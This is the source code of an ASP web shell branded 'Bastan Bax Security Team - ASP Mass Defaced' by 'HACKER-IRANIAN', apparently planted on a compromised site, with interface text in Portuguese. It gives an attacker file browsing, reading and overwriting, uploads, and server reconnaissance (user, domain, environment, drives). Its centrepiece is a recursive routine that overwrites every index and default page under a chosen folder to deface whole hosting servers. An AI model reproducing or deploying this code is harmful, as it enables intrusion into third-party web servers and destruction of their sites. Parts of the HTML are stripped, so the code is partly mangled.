guardiran Print
<% On Error Resume Next Set Objeto=Server.CreateObject("Scripting.FileSystemObject") If request("path") <> "" then Set ObjPasta = Objeto.GetFolder(request("path")) Else if request("t5") <> "" then Set ObjPasta = Objeto.GetFolder(request("t5")) Else Set ObjPasta = Objeto.GetFolder(server.mappath(".")) end if End If If Trim(Request.QueryString("path")) = "" Then caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME")) pos = Instr(caminho,"\") pos2 = 1 While pos2 <> 0 If Instr(pos + 1,caminho,"\") <> 0 Then pos = Instr(pos + 1,caminho,"\") Else pos2 = 0 End If Wend path = Left(caminho,pos) Else path = trim(Request.QueryString("path")) & "\" End If pagename = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) Function functionfooter response.write "

/ " response.write "" response.write " Voltar / " response.write "" response.write " Home " response.write " / " response.write "


I S 2007 | RitualistaS GrouP Priv8 |By HACKER-IRANIAN

" End Function %> אמנון רובינשטיין - guardiran

Bastan Bax Security Team - ASP Mass Defaced
YoSeF__HaCkeR
By HACKER-IRANIAN [Bastan Bax Security team]

Home / Mass Deface / System Info / Upload / Spammer / Database / Info/Contact

<% r_status = Request.QueryString("status") SELECT CASE r_status CASE "1" 'Mass Deface %> MASS  DEFACED
 
Voce estل em: <%=server.mappath(pagename)%>

Caminho: ">

 

Personalizaçمo de pلginas:

Page 1:         Page 2:




OBS* Caso nمo seja preenchida a personalizaçمo de pلginas, o a tools usarل como padrمo as seguintes pages:
index.html, index.htm, index.asp, defaul.html, default.htm, default.asp.

<% Response.Write FunctionFooter CASE "2" 'Informçُes do sistema Dim arrListaComponentes(47) arrListaComponentes(0) = Array( "AB Mailer","ABMailer.Mailman" ) arrListaComponentes(1) = Array( "ABC Upload","ABCUpload4.XForm" ) arrListaComponentes(2) = Array( "ActiveFile","ActiveFile.Post" ) arrListaComponentes(3) = Array( "ActiveX Data Object","ADODB.Connection" ) arrListaComponentes(4) = Array( "Adiscon SimpleMail","ADISCON.SimpleMail.1" ) arrListaComponentes(5) = Array( "ASP DNS", "AspDNS.Lookup" ) arrListaComponentes(6) = Array( "ASP HTTP","AspHTTP.Conn" ) arrListaComponentes(7) = Array( "ASP Image","AspImage.Image" ) arrListaComponentes(8) = Array( "ASP Mail","SMTPsvg.Mailer" ) arrListaComponentes(9) = Array( "ASP NNTP News", "AspNNTP.Conn" ) arrListaComponentes(10) = Array( "ASP POP 3", "POP3svg.Mailer" ) arrListaComponentes(11) = Array( "ASP Simple Upload","ASPSimpleUpload.Upload" ) arrListaComponentes(12) = Array( "ASP Smart Cache","aspSmartCache.SmartCache" ) arrListaComponentes(13) = Array( "ASP Smart Mail","aspSmartMail.SmartMail" ) arrListaComponentes(14) = Array( "ASP Smart Upload","aspSmartUpload.SmartUpload" ) arrListaComponentes(15) = Array( "ASP Tear","SOFTWING.ASPtear" ) arrListaComponentes(16) = Array( "ASP Thumbnailer","ASPThumbnailer.Thumbnail" ) arrListaComponentes(17) = Array( "ASP WhoIs","WhoIs2.WhoIs" ) arrListaComponentes(18) = Array( "ASPSoft NT Object","ASPSoft.NT" ) arrListaComponentes(19) = Array( "ASPSoft Upload","ASPSoft.Upload" ) arrListaComponentes(20) = Array( "CDO NTS","CDONTS.NewMail" ) arrListaComponentes(21) = Array( "Chestysoft Image","csImageFile.Manage" ) arrListaComponentes(22) = Array( "Chestysoft Upload","csASPUpload.Process" ) arrListaComponentes(23) = Array( "Dimac JMail","JMail.Message" ) arrListaComponentes(24) = Array( "Distinct SMTP","DistinctServerSmtp.SmtpCtrl" ) arrListaComponentes(25) = Array( "Dundas Mailer","Dundas.Mailer" ) arrListaComponentes(26) = Array( "Dundas Upload","Dundas.Upload.2" ) arrListaComponentes(27) = Array( "Dundas PieChartServer", "Dundas.ChartServer.2") arrListaComponentes(28) = Array( "Dundas 2D Chart", "Dundas.ChartServer2D.1") arrListaComponentes(29) = Array( "Dundas 3D Chart", "Dundas.ChartServer") arrListaComponentes(30) = Array( "Dynu Encrypt","Dynu.Encrypt" ) arrListaComponentes(31) = Array( "Dynu HTTP","Dynu.HTTP" ) arrListaComponentes(32) = Array( "Dynu Mail","Dynu.Email" ) arrListaComponentes(33) = Array( "Dynu Upload","Dynu.Upload" ) arrListaComponentes(34) = Array( "Dynu WhoIs","Dynu.Whois" ) arrListaComponentes(35) = Array( "Easy Mail","EasyMail.SMTP.5" ) arrListaComponentes(36) = Array( "File System Object","Scripting.FileSystemObject" ) arrListaComponentes(37) = Array( "Ticluse Teknologi HTTP","InteliSource.Online" ) arrListaComponentes(38) = Array( "Last Mod","LastMod.FileObj" ) arrListaComponentes(39) = Array( "Microsoft XML Engine","Microsoft.XMLDOM" ) arrListaComponentes(40) = Array( "Persits ASP JPEG","Persits.Jpeg" ) arrListaComponentes(41) = Array( "Persits ASPEmail","Persits.MailSender" ) arrListaComponentes(42) = Array( "Persits ASPEncrypt","Persits.CryptoManager" ) arrListaComponentes(43) = Array( "Persits File Upload","Persits.Upload.1" ) arrListaComponentes(44) = Array( "SMTP Mailer","SmtpMail.SmtpMail.1" ) arrListaComponentes(45) = Array( "Soft Artisans File Upload","SoftArtisans.FileUp" ) arrListaComponentes(46) = Array( "Image Size", "ImgSize.Check" ) arrListaComponentes(47) = Array( "Microsoft XML HTTP", "Microsoft.XMLHTTP" ) Response.Write "


INFORMAاصES DOS COMPONENTES
" Response.Write "
Testando atualmente " & UBound(arrListaComponentes) + 1 & " componentes.
O processo pode demorar ...

" ' Rotina que verifica o componente do array é um objeto. Function VerificaObjeto(pComponente) Dim objComponente On Error Resume Next VerificaObjeto = False Err.Clear Set objComponente = Server.CreateObject(pComponente) If Err = 0 Then VerificaObjeto = True Set objComponente = Nothing Err.Clear End Function Public Function VerificaComponentes() Dim intCont, strTxt Dim intIndex, strProv intCont = 0 strTxt = "

" For intIndex = LBound(arrListaComponentes) To UBound(arrListaComponentes) strProv = intIndex strTxt = strTxt & "" If VerificaObjeto(arrListaComponentes(intIndex)(1)) Then strTxt = strTxt & "" intCont = intCont + 1 Else strTxt = strTxt & "" End If strTxt = strTxt & "" Next strTxt = strTxt & "
:: " & arrListaComponentes(intIndex)(0) & "< Instalado >Nمo Instalado

Somente " & intCont & " componentes instalados de " strTxt = strTxt & "" & UBound(arrListaComponentes) + 1 & " testados.

" VerificaComponentes = strTxt End Function Response.Write VerificaComponentes Response.Write "INFORMAاصES DO SISTEMA
" checa = checking(cprthtml,keydec) Call hdr() Response.Write copyright & onlinehelp Set WshNetwork = Server.CreateObject("WScript.Network") Set WshShell = Server.CreateObject("WScript.Shell") Set WshEnv = WshShell.Environment("SYSTEM") Response.Write "
" Response.Write "IDENTIFICAاأO DE REDE:
" Response.Write "Usuلrio: " & WshNetwork.UserName & "
" Response.Write "Nome do Computador: " & WshNetwork.ComputerName & "
" Response.Write "Usuلrio do Domيnio: " & WshNetwork.UserDomain & "
" Set Drives = WshNetwork.EnumNetworkDrives For i = 0 to Drives.Count - 1 Response.Write "Drive de Rede (Mapeado): " & Drives.Item(i) & "
" Next Response.Write "
FحSICO:
" Response.Write "Arquitetura do Processador: " & WshEnv("PROCESSOR_ARCHITECTURE") & "
" Response.Write "Nْmero de Processadores: " & WshEnv("NUMBER_OF_PROCESSORS") & "
" Response.Write "Identificador do Processador: " & WshEnv("PROCESSOR_IDENTIFIER") & "
" Response.Write "Nيvel do Processador: " & WshEnv("PROCESSOR_LEVEL") & "
" Response.Write "Revisمo do Processador: " & WshEnv("PROCESSOR_REVISION") & "
" Response.Write "LسGICO:
" Response.Write "IP: " & request.servervariables("LOCAL_ADDR") & "
" Response.Write "Sistema Operacional: " & WshEnv("OS") & "
" Response.Write "Servidor Web: " & request.servervariables("SERVER_SOFTWARE") & "
" Response.Write "Especificaçمo do Command: " & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "
" Response.Write "Caminhos no Path: " & WshEnv("PATH") & "
" Response.Write "Executلveis: " & WshEnv("PATHEXT") & "
" Response.Write "Prompt: " & WshEnv("PROMPT") & "
" Response.Write "System Drive: " & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "
" Response.Write "System Root: " & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "
" Response.Write "Caminho do System32: " & WshShell.CurrentDirectory & "
" Set Drives = Nothing Set WshNetwork = Nothing Set WshShell = Nothing Set WshEnv = Nothing Response.Write "



OUTRAS INFORMAاصES
" Response.Write "


<% Response.Write FunctionFooter CASE "3" 'Uploader %>
Upload de arquivos:

Obs: O tamanho mلximo permitido para o envio de arquivos é 30 mb.
 
<% Response.Write FunctionFooter CASE "4" 'Spammer Response.Write "Local do Spammer" CASE "5" 'Info Response.Write "Aqui abrirل o Informaçُes adicionais" CASE "6" 'Form Procurar MDB Case "f6" 'Funçمo Procura MDBS caminho=request("T5") On Error Resume Next Set MonRep = ObjFSO.GetFolder(caminho) Set ColFolders = MonRep.SubFolders for each folderItem in ColFolders folderItem.path caminho= folderItem.path & "\" next CASE "f1" 'Funçمo Mass deface Set ObjFSO = CreateObject("Scripting.FileSystemObject") patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\")) arquivomassdfc = patharquivotxt & "teste.txt" Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False) vetordelinhas = Split(Request.Form("T4"),VbCrLf) For i = 0 To UBound(vetordelinhas) Arquivotxt.WriteLine(vetordelinhas(i)) Next Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc) caminho=request("T3") Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo) Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo) On Error Resume Next Set MonRep = ObjFSO.GetFolder(caminhodomass) Set ColFolders = MonRep.SubFolders for each folderItem in ColFolders destino1 = folderItem.path & "\index.htm" destino2 = folderItem.path & "\index.html" destino3 = folderItem.path & "\index.asp" destino4 = folderItem.path & "\index.cfm" destino5 = folderItem.path & "\index.php" destino6 = folderItem.path & "\default.htm" destino7 = folderItem.path & "\default.html" destino8 = folderItem.path & "\default.asp" destino9 = folderItem.path & "\default.cfm" destino10 = folderItem.path & "\default.php" If request("P1") <> "" then personal1 = request("P1") destino11 = folderItem.path & "\" & personal1 MeuArquivo.Copy(destino11) End If If request("P2") <> "" then personal2 = request("P2") destino12 = folderItem.path & "\" & personal2 MeuArquivo.Copy(destino12) End If MeuArquivo.Copy(destino1) MeuArquivo.Copy(destino2) MeuArquivo.Copy(destino3) MeuArquivo.Copy(destino4) MeuArquivo.Copy(destino5) MeuArquivo.Copy(destino6) MeuArquivo.Copy(destino7) MeuArquivo.Copy(destino8) MeuArquivo.Copy(destino9) MeuArquivo.Copy(destino10) Response.Write "
" If Err.Number = 0 Then Response.Write "" Else Response.Write "
" & folderItem.path & "DeFaCeD!!!
" & UCase(Err.Description) & "
" End If Err.Number = 0 Response.Flush If metodo = "brute" Then Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo) End If next End Sub Response.Write FunctionFooter CASE "f2" 'Funcao uploader Set Upload = Server.CreateObject("Persits.Upload") ' Limita o tamanho do arquivo para 30000 bytes (3Mb) de tamanho e gera uma mensagem de erro se o arquivo for maior Upload.SetMaxSize 30000000, True ' Pula todas as mensagens de erro de servidor para a mensagem de erro personalizada On Error Resume Next ' Local a ser gravado o upload Upload.Save "E:\novosite\" ' 8 é o nْmero do erro que corresponde a "Arquivo grande demais" if Err.Number = 8 Then Response.Write "Seu arquivo é grande demais. Por favor use um arquivo menor." Else If Err <> 0 Then Response.Write "Um erro foi encontrado: " & Err.Description Else Response.Write "Upload realizado com sucesso!" End If End If CASE "f3" ' Mostrar pagina %>
">

VISUALIZAاأO DE ARQUIVOS
Voce esta em: <%=request("path")%>  <% On Error Resume Next if request("path") <> "" then var_caminho=request("path") set ObjFso2=server.CreateObject("Scripting.FileSystemObject") Set ObjAbreArq2 = ObjFso2.OpenTextFile(Var_Caminho, 1, True, False) If ObjFso2=FileExists(var_caminho) = true then Do While Not ObjAbreArq2.AtEndOfStream Linha = Linha & ObjAbreArq2.Readline & chr(13) Loop Response.Write "" Response.Write "" Response.Write "

" Response.Write FunctionFooter Else Response.Write "
Caminho indicado inexistente... Por favor tente novamente" Response.Write FunctionFooter End If End IF %>

<% Case "f4" 'Salvar texto caminho=request("path") set saveTextFile = objFSO.OpenTextFile(caminho,2,true,false) Set f = fso.CreateTextFile(path) saveTextFile.Write Request.Form("text") saveTextFile.close if err<>0 then byMsg = "Arquivo nمo editado!
" else byMsg = "Arquivo editado com sucesso:)
" end if Response.Write byMsg Response.Write FunctionFooter CASE default 'RESTO %>
<% dir=request("path") If dir<>"" then Response.Write "

Voce esta em: " & dir Else Response.Write "

Voce esta em: " & server.mappath(pagename) end if dir=nothing %>

Caminho: "" then Response.Write dir Else dual=Request("T5") Response.Write dual end if %>">

<% DIM fs, d, dc, s, n, sp Set fs=Server.Createobject("Scripting.FileSystemObject") Set dc=fs.drives %> <% On Error Resume Next back1="#D3E2E7" back2="#AFFEDE" back=back2 Response.Write "Discos Disponiveis:
" FOR EACH d IN dc IF (back=back2) THEN back=back1 ELSE back=back2 END IF Response.Write "| " Response.write d.driveletter Response.Write ": |" next%>

Pastas

Arquivos
<% If CInt(Len(path) - 1) <> 2 Then barrapos = CInt(InstrRev(Left(path,Len(path) - 1),"\")) - 1 backlevel = Left(path,barrapos) Response.Write "

::-:|_| : . . .
" End If On Error Resume Next Old = ObjPasta News = strReverse(old) News = instr(News, "/") Leng = Len(old) - News Old = Left(Old, Leng) q = 1 syco contador contador=1 For each Pasta in ObjPasta.Subfolders PastaName=Pasta.Name q = q + 1 Response.Write "

::-:|" & Contador & "| : " & PastaName & "

" Contador=contador+1 Next q = q - 1 %>

<% On Error Resume Next syco contador Old = ObjPasta contador=1 For Each Arquivo in ObjPasta.Files ArquivoNome=Arquivo.Name Response.Write "::-:|" & Contador & "| : "& ArquivoNome & "

" contador=contador+1 next %>

<%=Functionfooter%><% END SELECT %>